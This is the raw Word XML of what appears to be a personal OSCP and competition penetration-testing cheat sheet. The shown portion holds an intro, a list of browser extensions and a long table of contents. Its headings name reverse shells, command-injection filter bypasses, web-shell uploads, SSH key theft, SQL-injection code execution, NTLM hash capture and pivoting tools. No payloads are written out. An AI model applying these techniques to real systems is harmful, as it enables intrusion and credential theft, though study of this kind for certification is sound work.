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rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_opwyjk80h67y" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For competitions, remove OSCP stuff (including the links to the OSCP document) or paraphrase it </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Fastest way to load the document is by clicking on the last page via the Table Of Contents</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000003">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And you can move around the document quickly by holding SHIFT and clicking on the scroll wheel on the right side</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_6c77uh9qnja5" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Extensions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="240"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cookie-editor</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="1044099" cy="381842"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="354" name="image348.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image348.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1044099" cy="38184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240"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Wappalyzer</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="685800" cy="561975"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="287" name="image277.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image277.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858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Other documents:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="882"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId9">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">ALL MY pentesting/hacking documents</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="882"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId10">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Pen Testing Checklist</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="882"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId11">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Active Directory Penetration Testing Notes</w:t>
        </w:r>
      </w:hyperlink>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1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_oul28sbxvwnn" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>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sdt>
      <w:sdtPr>
        <w:id w:val="1145611882"/>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pwyjk80h67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For competitions, remove OSCP stuff (including the links to the OSCP document) or paraphrase it</w:t>
              <w:tab/>
              <w:t xml:space="preserve">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c77uh9qnj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Extensions</w:t>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ul28sbxvwn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t8x31ewoxa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Important</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iyvt7nyd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Default Credentials</w:t>
              <w:tab/>
              <w:t xml:space="preserve">17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lcyhht2z5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get a more stable connection after getting reverse shell</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z9piaqe9pj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pip install</w:t>
              <w:tab/>
              <w:t xml:space="preserve">18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8ax56qcj64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rlwrap</w:t>
              <w:tab/>
              <w:t xml:space="preserve">18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mx49toal5y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AutoRecon</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ypauk9xvt2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OSCP-Scripts</w:t>
              <w:tab/>
              <w:t xml:space="preserve">21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d2ff67gc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CMSmap</w:t>
              <w:tab/>
              <w:t xml:space="preserve">23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iu7d2yh14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Apache</w:t>
              <w:tab/>
              <w:t xml:space="preserve">23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624e89ok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the root directory of Apache (so you know where to put rev shells)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">24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3hzroo152g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Web</w:t>
              <w:tab/>
              <w:t xml:space="preserve">24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b9mi4bz2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Bruteforce website login using Burpsuite</w:t>
              <w:tab/>
              <w:t xml:space="preserve">26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7vrd545o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tell if a site is wordpress</w:t>
              <w:tab/>
              <w:t xml:space="preserve">28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8ymg922qp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Parse User Agents</w:t>
              <w:tab/>
              <w:t xml:space="preserve">28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pcsguhzx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 Requests</w:t>
              <w:tab/>
              <w:t xml:space="preserve">28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v2zgxoj5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Default Pages (how to find domain names)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">29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0a72mxcy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Bypass/Avoid Redirection using Burpsuite</w:t>
              <w:tab/>
              <w:t xml:space="preserve">29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s0mt52z5h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Interesting web attack vector with changing request type, and adding headers</w:t>
              <w:tab/>
              <w:t xml:space="preserve">29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a9voelx4q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API endpoints in website URL</w:t>
              <w:tab/>
              <w:t xml:space="preserve">30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0qumhrch80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pretend to be another IP when viewing pages (IP Spoofing) using X-Forwarded-For</w:t>
              <w:tab/>
              <w:t xml:space="preserve">30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padhrxm038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view pages as a search engine</w:t>
              <w:tab/>
              <w:t xml:space="preserve">32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q1r15tr2i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Burpsuite</w:t>
              <w:tab/>
              <w:t xml:space="preserve">32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jh21fgl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automate adding HTTP headers on Burpsuite</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ctoh0dtqc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PHP</w:t>
              <w:tab/>
              <w:t xml:space="preserve">34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h38rpx0w5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strcmp() bypass with PHP Type Juggling</w:t>
              <w:tab/>
              <w:t xml:space="preserve">34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4melwu1cnq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PHP Wrappers (from OSCP 9.2.2. PHP Wrappers)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">34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ii481iii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root directory in PHP</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ctotiz4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phpinfo.php</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llwyc71z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Reading PHP source code to understand how file upload works</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mbpedlpt1b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phpMyAdmin</w:t>
              <w:tab/>
              <w:t xml:space="preserve">43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920uvug7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reverse shell from phpMyAdmin:</w:t>
              <w:tab/>
              <w:t xml:space="preserve">43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1z0dhcqs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45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746dlmg9p9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Firefox and .mozilla (and firefox_decrypt)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">46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stzwrn7ndb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Metasploit</w:t>
              <w:tab/>
              <w:t xml:space="preserve">47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sarjvcr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Basics</w:t>
              <w:tab/>
              <w:t xml:space="preserve">48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r1y9tjoi2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Spaces</w:t>
              <w:tab/>
              <w:t xml:space="preserve">48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oj8lcjzw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Miscellaneous</w:t>
              <w:tab/>
              <w:t xml:space="preserve">49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au08fuka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Meterpreter and Staged Payloads</w:t>
              <w:tab/>
              <w:t xml:space="preserve">50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3667ew8tz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Core Meterpreter Post-Exploitation Features</w:t>
              <w:tab/>
              <w:t xml:space="preserve">51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2kzg1h8oe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Post-Exploitation Modules</w:t>
              <w:tab/>
              <w:t xml:space="preserve">55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7a9yveem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Pivoting with Metasploit</w:t>
              <w:tab/>
              <w:t xml:space="preserve">64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9nxvtzuh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Msfvenom</w:t>
              <w:tab/>
              <w:t xml:space="preserve">72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nai5ar3d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Non-staged msfvenom payload</w:t>
              <w:tab/>
              <w:t xml:space="preserve">72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f1nndub19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Staged msfvenom payload</w:t>
              <w:tab/>
              <w:t xml:space="preserve">73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fja1c96nl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Automating Metasploit using Resource Scripts</w:t>
              <w:tab/>
              <w:t xml:space="preserve">75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86gzo3x9n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Jobs and Sessions:</w:t>
              <w:tab/>
              <w:t xml:space="preserve">79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a5x79p15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upgrade from a weak shell to a meterpreter:</w:t>
              <w:tab/>
              <w:t xml:space="preserve">80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5q41horn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Temporary shell in Meterpreter (Channels)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">81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rxpg6ma4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interact with local files while using Metasploit</w:t>
              <w:tab/>
              <w:t xml:space="preserve">82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0go0vwru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Staged vs. Non-Staged Payloads</w:t>
              <w:tab/>
              <w:t xml:space="preserve">82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kcrp3udw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upload .rb modules to Metasploit</w:t>
              <w:tab/>
              <w:t xml:space="preserve">83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h27emg69e2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Building intuition for knowing when to use tunneling/pivots</w:t>
              <w:tab/>
              <w:t xml:space="preserve">84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0drml7b0et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Ligolo-NG</w:t>
              <w:tab/>
              <w:t xml:space="preserve">84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mr4ia63oj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Quick Guide:</w:t>
              <w:tab/>
              <w:t xml:space="preserve">85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txh7fm0v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 Ligolo-NG</w:t>
              <w:tab/>
              <w:t xml:space="preserve">85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wilwxd1w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Ligolo-NG</w:t>
              <w:tab/>
              <w:t xml:space="preserve">86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jswm9p09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set up VPN-like Experience</w:t>
              <w:tab/>
              <w:t xml:space="preserve">88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iv5gbjw9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local port forward (access target machine as local host)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">89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u4sy8r1u3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NMAP in Ligolo-NG</w:t>
              <w:tab/>
              <w:t xml:space="preserve">90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9et81mio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 forward from pivot to Kali</w:t>
              <w:tab/>
              <w:t xml:space="preserve">90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jb9otocb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Transfer with Ligolo-NG</w:t>
              <w:tab/>
              <w:t xml:space="preserve">91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xjlabd7c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Ligolo-NG</w:t>
              <w:tab/>
              <w:t xml:space="preserve">91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0egpwpdq1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delete Ligolo TUN interface for a complete reset</w:t>
              <w:tab/>
              <w:t xml:space="preserve">92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887gbooaan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Port Redirection &amp; Port Forwarding</w:t>
              <w:tab/>
              <w:t xml:space="preserve">93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st28pb9g2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Port Forwarding with Socat</w:t>
              <w:tab/>
              <w:t xml:space="preserve">93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au8ewq6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Socat</w:t>
              <w:tab/>
              <w:t xml:space="preserve">95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vwchxwoxy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Starting a new socat port forward</w:t>
              <w:tab/>
              <w:t xml:space="preserve">97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kod8pboxmq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Port Forwarding vs. Socat Port Forwarding</w:t>
              <w:tab/>
              <w:t xml:space="preserve">98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edurrac5ch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Local Port Forwarding</w:t>
              <w:tab/>
              <w:t xml:space="preserve">98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nj0b684j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Enumeration</w:t>
              <w:tab/>
              <w:t xml:space="preserve">100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j5kd8mcc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 Port Forwarding using SSH</w:t>
              <w:tab/>
              <w:t xml:space="preserve">102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a7gcji5lwn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Dynamic Port Forwarding</w:t>
              <w:tab/>
              <w:t xml:space="preserve">104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9cp9ylzd0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Dynamic Port Forwarding with SSH</w:t>
              <w:tab/>
              <w:t xml:space="preserve">105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46mrp99x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Proxychains</w:t>
              <w:tab/>
              <w:t xml:space="preserve">106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r6cpmccgvk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Remote Port Forwarding</w:t>
              <w:tab/>
              <w:t xml:space="preserve">109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vrn4ne0f7y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Remote Dynamic Port Forwarding</w:t>
              <w:tab/>
              <w:t xml:space="preserve">112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nltbfc7tz5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sshuttle</w:t>
              <w:tab/>
              <w:t xml:space="preserve">115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78x9zxnt8r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Port Forwarding with Windows Tools</w:t>
              <w:tab/>
              <w:t xml:space="preserve">117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driqwbpvfv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Set up SOCKS5 Proxy to access internal network</w:t>
              <w:tab/>
              <w:t xml:space="preserve">117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xkjph5mq54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SOCKS</w:t>
              <w:tab/>
              <w:t xml:space="preserve">120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3p35m1x7cm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download Chisel</w:t>
              <w:tab/>
              <w:t xml:space="preserve">121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o4628n3cjx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HTTP Tunneling using Chisel (Reverse Single Port Forwarding) (windows)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">121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atwn0iq8hw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HTTP Tunneling using Chisel (Reverse Dynamic Port Forwarding)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">123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qd9aoud52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Chisel to our Kali and CONFLUENCE01</w:t>
              <w:tab/>
              <w:t xml:space="preserve">126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h9cv7ts8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Chisel</w:t>
              <w:tab/>
              <w:t xml:space="preserve">126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fxwknx21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debug Chisel problems</w:t>
              <w:tab/>
              <w:t xml:space="preserve">130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a7s5dvitpq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HTTP Tunneling using Chisel (Local Port forwarding)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">135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p5psgtqd0m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HTTP Tunneling using Chisel (Dynamic Port forwarding)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">137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s51w6jlo0l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Tunneling using Chisel</w:t>
              <w:tab/>
              <w:t xml:space="preserve">139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wy2qvximtw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Tunneling vs. SOCKS proxy</w:t>
              <w:tab/>
              <w:t xml:space="preserve">142</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ig1hqsh0qm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DNS Tunneling with dnscat2</w:t>
              <w:tab/>
              <w:t xml:space="preserve">143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ccsnocegsk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Pivoting with Metasploit</w:t>
              <w:tab/>
              <w:t xml:space="preserve">144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4gxdy7saj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Route Add</w:t>
              <w:tab/>
              <w:t xml:space="preserve">145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nzbishie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multi/manage/autoroute</w:t>
              <w:tab/>
              <w:t xml:space="preserve">147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6gn0ayqp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SOCKS proxy in Metasploit</w:t>
              <w:tab/>
              <w:t xml:space="preserve">149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k2xflvta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 forwarding inside of metasploit</w:t>
              <w:tab/>
              <w:t xml:space="preserve">151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zzf34ypnik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SCP</w:t>
              <w:tab/>
              <w:t xml:space="preserve">153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lo8wd2tf9h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w:t>
              <w:tab/>
              <w:t xml:space="preserve">154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73cxcoaw9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Finding SSH version exploits</w:t>
              <w:tab/>
              <w:t xml:space="preserve">156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nv3kfjh14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Linux version (of target machine) based on SSH version info</w:t>
              <w:tab/>
              <w:t xml:space="preserve">156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itt1f6zr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Decrypting SSH Key</w:t>
              <w:tab/>
              <w:t xml:space="preserve">157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g9acb7v6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and Private keys</w:t>
              <w:tab/>
              <w:t xml:space="preserve">157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fxs368ef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turn on SSH if it's not on (how to open SSH)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">157</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qjundbom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SSH public key injection attack via authorized_keys file</w:t>
              <w:tab/>
              <w:t xml:space="preserve">158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6e3saqpb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authorized_keys</w:t>
              <w:tab/>
              <w:t xml:space="preserve">159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fgq5vqno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Bruteforce SSH with username and password list</w:t>
              <w:tab/>
              <w:t xml:space="preserve">161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3ufmbqg9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 Port Forwarding</w:t>
              <w:tab/>
              <w:t xml:space="preserve">161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68uen423kh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Stealing SSH keys</w:t>
              <w:tab/>
              <w:t xml:space="preserve">162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zsyrftvgg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Stealing SSH keys via LFI</w:t>
              <w:tab/>
              <w:t xml:space="preserve">163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f3ye7obe2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Stealing SSH Keys that have passphrases and cracking them</w:t>
              <w:tab/>
              <w:t xml:space="preserve">165</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tt9fpevndk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Overwriting authorized_keys file using file upload</w:t>
              <w:tab/>
              <w:t xml:space="preserve">167</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4pf4ywjliw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tcpdump</w:t>
              <w:tab/>
              <w:t xml:space="preserve">172</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8m31gv10nm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send pings to Kali from target machine to check if you have command execution blindly (using tcpdump)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">173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6fjrw8402i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Command Injections</w:t>
              <w:tab/>
              <w:t xml:space="preserve">174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i98c6883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the ; (semicolon) for command injection</w:t>
              <w:tab/>
              <w:t xml:space="preserve">174</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xjb5ayfza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the | (pipe) for command injection</w:t>
              <w:tab/>
              <w:t xml:space="preserve">175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l7axrvhv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Base64 encoding reverse shell</w:t>
              <w:tab/>
              <w:t xml:space="preserve">176</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6r9vjqd4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command injections to try:</w:t>
              <w:tab/>
              <w:t xml:space="preserve">177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1p9eb4bd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(BLIND) Command Injection for downloading photos:</w:t>
              <w:tab/>
              <w:t xml:space="preserve">177</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86an83jfc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to bypass command injection filters</w:t>
              <w:tab/>
              <w:t xml:space="preserve">180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7ck8gjg520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Reverse Shell Types Explained</w:t>
              <w:tab/>
              <w:t xml:space="preserve">187</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74qrsqbsv9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Busybox</w:t>
              <w:tab/>
              <w:t xml:space="preserve">188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2ldiuvu0u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upload and execute reverse shell upload.php and run.php (Staged Reverse Shell via Web Execution)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">189</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xerge15s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run.php looks like for non .exe payloads</w:t>
              <w:tab/>
              <w:t xml:space="preserve">191</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kg721mpt8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upload.php looks like for non-php languages</w:t>
              <w:tab/>
              <w:t xml:space="preserve">193</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irri5uxldv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Getting a Reverse Shell</w:t>
              <w:tab/>
              <w:t xml:space="preserve">194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0bjiuyhp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MSFVENOM linux reverse shell:</w:t>
              <w:tab/>
              <w:t xml:space="preserve">194</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46e05hhb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via arbitrary code execution</w:t>
              <w:tab/>
              <w:t xml:space="preserve">196</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ko0tlv478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Upgrading Reverse Shell</w:t>
              <w:tab/>
              <w:t xml:space="preserve">198</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skxaui205k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Uploading reverse shells and webshells to websites</w:t>
              <w:tab/>
              <w:t xml:space="preserve">201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ssmu0tedue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bypass extension restrictions for file upload (including rev shell) on Apache by using .htaccess</w:t>
              <w:tab/>
              <w:t xml:space="preserve">204</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z2o5der4e9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Uploading reverse shell as an image using GIF signature</w:t>
              <w:tab/>
              <w:t xml:space="preserve">206</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gxvond7ssq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Upgrading webshell to reverse shell</w:t>
              <w:tab/>
              <w:t xml:space="preserve">207</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p11qe6wm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nc</w:t>
              <w:tab/>
              <w:t xml:space="preserve">207</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et63w5ce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python</w:t>
              <w:tab/>
              <w:t xml:space="preserve">208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vn69iwdc2u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Encoding Reverse Shells in Base64 for powershell</w:t>
              <w:tab/>
              <w:t xml:space="preserve">208</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qbembl8m9b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Brute force login page using WFuzz</w:t>
              <w:tab/>
              <w:t xml:space="preserve">210</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6f5caykkl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FFUF</w:t>
              <w:tab/>
              <w:t xml:space="preserve">211</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ss2gd4v9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URL Fuzzing (finding URL paths):</w:t>
              <w:tab/>
              <w:t xml:space="preserve">212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gnwmru2l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Parameter fuzzing</w:t>
              <w:tab/>
              <w:t xml:space="preserve">213</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78lk212ch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Subdomain/virtual host fuzzing (finding subdomains):</w:t>
              <w:tab/>
              <w:t xml:space="preserve">214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l5szp89e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virtual hosting (which is most cases, cuz we have a target IP):</w:t>
              <w:tab/>
              <w:t xml:space="preserve">215</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w1e3xjxeas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Dirsearch</w:t>
              <w:tab/>
              <w:t xml:space="preserve">217</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wqdq3sq3vb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DirBuster</w:t>
              <w:tab/>
              <w:t xml:space="preserve">218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a7q5gchwzr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GoBuster</w:t>
              <w:tab/>
              <w:t xml:space="preserve">218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zod8yv3eht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Netcat (nc)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">219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w65w3ow6in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Telnet</w:t>
              <w:tab/>
              <w:t xml:space="preserve">220</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vdihaxkum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Nikito</w:t>
              <w:tab/>
              <w:t xml:space="preserve">221</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l12rzc7gdh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Hydra</w:t>
              <w:tab/>
              <w:t xml:space="preserve">222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lcoxkga8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Bruteforce Websites using Hydra</w:t>
              <w:tab/>
              <w:t xml:space="preserve">223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v4rbrfoa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Password lists</w:t>
              <w:tab/>
              <w:t xml:space="preserve">226</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odnmqkh3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common Hydra services</w:t>
              <w:tab/>
              <w:t xml:space="preserve">226</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z8aqcxmhn1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Wordlists</w:t>
              <w:tab/>
              <w:t xml:space="preserve">227</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1ekjdjuwk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cewl</w:t>
              <w:tab/>
              <w:t xml:space="preserve">228</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4px4ue38au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cupp</w:t>
              <w:tab/>
              <w:t xml:space="preserve">229</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6q9tbs19i7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SMB (the AD cheatsheet is more updated for SMB)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">230</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m346waqv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Enumerate SMB using nxc (Net Exec)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">230</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y1wyz9qob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users in SMB</w:t>
              <w:tab/>
              <w:t xml:space="preserve">231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dzst5yk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bruteforce enumeration with a username list:</w:t>
              <w:tab/>
              <w:t xml:space="preserve">232</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uge4ebgl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bruteforce enumeration with a username list and password list:</w:t>
              <w:tab/>
              <w:t xml:space="preserve">232</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19srmv7o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Enumerate SMB using nmap</w:t>
              <w:tab/>
              <w:t xml:space="preserve">233</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3fhc19e4hn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FTP</w:t>
              <w:tab/>
              <w:t xml:space="preserve">234</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y2ogfu67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mount FTP Server</w:t>
              <w:tab/>
              <w:t xml:space="preserve">235</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x59wzt5px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Bruteforce default creds (without any previous info)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">236</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quv4559u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Passive Mode</w:t>
              <w:tab/>
              <w:t xml:space="preserve">237</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x9mkcc9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reverse shell to FTP, and then accessing it through a website</w:t>
              <w:tab/>
              <w:t xml:space="preserve">238</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yzv6k9kfqu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/var/ftp write permissions leading to reverse shell (putting in reverse shell to ftp)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">240</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5tst6vkrca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files in Linux</w:t>
              <w:tab/>
              <w:t xml:space="preserve">242</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czmvlevqpt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grep</w:t>
              <w:tab/>
              <w:t xml:space="preserve">243</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2u8xja1rre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Automated Privilege Escalation</w:t>
              <w:tab/>
              <w:t xml:space="preserve">244</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f8soyano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Linux-exploit-suggester</w:t>
              <w:tab/>
              <w:t xml:space="preserve">244</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zzsmbhh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unix-privesc-check</w:t>
              <w:tab/>
              <w:t xml:space="preserve">245</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9k2mc1txxl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LinPEAS</w:t>
              <w:tab/>
              <w:t xml:space="preserve">246</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y35hfito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save linPEAS output to sublime text with color</w:t>
              <w:tab/>
              <w:t xml:space="preserve">247</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fof8uh6gx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Extracting important information</w:t>
              <w:tab/>
              <w:t xml:space="preserve">249</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771kll5abk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Linux Smart Enumeration</w:t>
              <w:tab/>
              <w:t xml:space="preserve">253</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cycbtq8w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Helpful sections</w:t>
              <w:tab/>
              <w:t xml:space="preserve">253</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lkgurambk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Manual Privilege Escalation</w:t>
              <w:tab/>
              <w:t xml:space="preserve">255</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ipg2fsau8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netstat (to look at open ports)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">259</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pdwj96pzkf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.bash_history</w:t>
              <w:tab/>
              <w:t xml:space="preserve">259</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wx8275jufl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 -tulnp</w:t>
              <w:tab/>
              <w:t xml:space="preserve">260</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hop5jxnjbf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pspy</w:t>
              <w:tab/>
              <w:t xml:space="preserve">263</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h9m1fnbezl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Identifying SQLi via Error-based Payloads (for mysql)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">264</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nd2dwy2teb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UNION-based SQL Injection Payloads</w:t>
              <w:tab/>
              <w:t xml:space="preserve">266</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bqwrktvi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Blind SQL Injections (opposite of in-band)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">273</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wl998ganxw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test for SQL injection for</w:t>
              <w:tab/>
              <w:t xml:space="preserve">275</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pf5ggrrt34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SQL authentication bypass (to get past login page)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">276</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c7zo345unf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Manual Code Execution for SQL (SQL Injections)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">277</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2iucmkox5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Enabling command execution with xp_cmdshell through website (only works for mssql)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">277</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edofmw5i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Enabling command execution with xp_cmdshell through mssql client (only works for mssql)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">279</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hj9cko0o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web shell through sql injection (through UNION-based payload)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">279</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6pa5tkbh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web shell through sql injection (through command injection)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">281</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wm8wd1v0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web shell with PostgreSQL (never tested)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">282</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imcc81yo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OSCP</w:t>
              <w:tab/>
              <w:t xml:space="preserve">282</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xpantnvkdf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Automated Code Execution (SQL Map) (SQL Injections)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">286</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jz16feiyb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SQLMap and SQL injections</w:t>
              <w:tab/>
              <w:t xml:space="preserve">291</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s1a6fa3ylf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Microsoft SQL Server (mssql) (ms-sql-s)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">297</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q3vcr20l5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mssql</w:t>
              <w:tab/>
              <w:t xml:space="preserve">298</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hcz16acu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impersonate other users on mssql to access databases you don't have access to</w:t>
              <w:tab/>
              <w:t xml:space="preserve">300</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5c9bw5vd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nxc and mssql</w:t>
              <w:tab/>
              <w:t xml:space="preserve">301</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swb7inbl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command execution in mssql after you are sysadmin</w:t>
              <w:tab/>
              <w:t xml:space="preserve">302</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f9wy8cij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run commands within mssql</w:t>
              <w:tab/>
              <w:t xml:space="preserve">303</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6epcsl8l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NTLM hash capture trick (using mssql xp_dirtree and responder)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">304</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csxpe9y4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crack the NTLMv2 hash</w:t>
              <w:tab/>
              <w:t xml:space="preserve">305</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tzzd1oev67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Mysql</w:t>
              <w:tab/>
              <w:t xml:space="preserve">305</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il5nfgi7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tell if you need to pivot</w:t>
              <w:tab/>
              <w:t xml:space="preserve">306</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gjna1lnk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reset passwords in MySQL table</w:t>
              <w:tab/>
              <w:t xml:space="preserve">306</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zf9kr0ge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add row to MySQL table (useful for adding fake users to access a website)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">307</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l1ozj57w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 Forcing mysql:</w:t>
              <w:tab/>
